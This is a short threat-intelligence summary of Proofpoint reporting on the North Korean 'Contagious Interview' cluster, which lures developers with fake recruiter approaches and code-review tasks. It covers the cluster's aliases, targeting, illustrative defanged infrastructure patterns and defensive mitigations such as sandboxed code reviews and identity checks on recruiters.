Full Report
Cybersecurity researchers have flagged two malicious cyber campaigns that exhibit similarities with a persistent North Korean threat cluster known as Contagious Interview (aka Famous Chollima, HexagonalRodent, and Void Dokkaebi). According to a report published by Proofpoint, the threat actor has been found orchestrating phishing campaigns using developer role recruitment or code review themes
Analysis Summary
# Threat Actor: Contagious Interview
## Attribution & Identity
* **Primary Name:** Contagious Interview
* **Aliases:** Famous Chollima, HexagonalRodent, Void Dokkaebi
* **Attribution:** Democratic People's Republic of Korea (DPRK) / North Korean state-sponsored cluster.
* **Associations:** Historically linked to the broader Lazarus Group umbrella or specialized sub-units focused on revenue generation and technical intelligence.
## Activity Summary
According to recent Proofpoint reporting, this threat actor is currently conducting two malicious cyber campaigns. The operations leverage social engineering through professional networking and development platforms, primarily disguised as:
* **Recruitment Schemes:** Posing as recruiters or hiring managers for high-paying developer roles.
* **Technical Collaboration:** Engaging targets through "code review" requests to establish trust before delivering malware.
## Tactics, Techniques & Procedures
* **Social Engineering:** Creating legitimate-looking professional profiles on platforms like LinkedIn to approach developers.
* **Themed Phishing:** Using recruitment and interview-related lures (Job descriptions, coding tasks).
* **Malicious Code Reviews:** Sending links to repositories or files under the guise of an active technical evaluation.
* **Trust Building:** Engaging in multi-stage conversations prior to the delivery of malicious payloads.
* **Execution:** Tricking targets into downloading and running malicious software disguised as coding challenges or project environments.
## Targeting
* **Sectors:** Technology, Software Development, Cryptocurrency, and Finance.
* **Geography:** Global (though typically focused on Western nations including the U.S. and Europe).
* **Victims:** Individual software developers, engineers, and IT professionals.
## Tools & Infrastructure
* **Malware Families:** Historically associated with various remote access trojans (RATs) and info-stealers (though specific 2024 variants should be verified against recent Proofpoint IOCs).
* **Infrastructure:**
* Professional networking sites for initial contact.
* GitHub or similar version control platforms for hosting malicious "coding tasks."
* Defanged examples of typical infrastructure patterns: `hxxp[:]//recruitment-portal[.]com`, `hxxps[:]//code-review-tasks[.]org`.
## Implications
This actor represents a strategic shift where human-to-human interaction is prioritized over automated exploit delivery. By targeting developers directly, the actor aims to bypass traditional perimeter security to gain entry into corporate environments or steal high-value assets (such as cryptocurrency private keys or intellectual property). The focus on developers also suggests a possible supply chain infiltration motive.
## Mitigations
* **Security Awareness:** Educate development teams on the risks of unsolicited recruiters asking for "coding tests" that require downloading executable files or npm packages.
* **Safe Environments:** Require all external code reviews or candidate testing to be performed in isolated, virtualized environments or "sandbox" machines.
* **Verify Identity:** Use out-of-band communication to verify the identity of recruiters and the legitimacy of the companies they claim to represent.
* **Endpoint Monitoring:** Monitor for suspicious process execution (e.g., unexpected PowerShell or script execution) originating from browser downloads or messaging applications.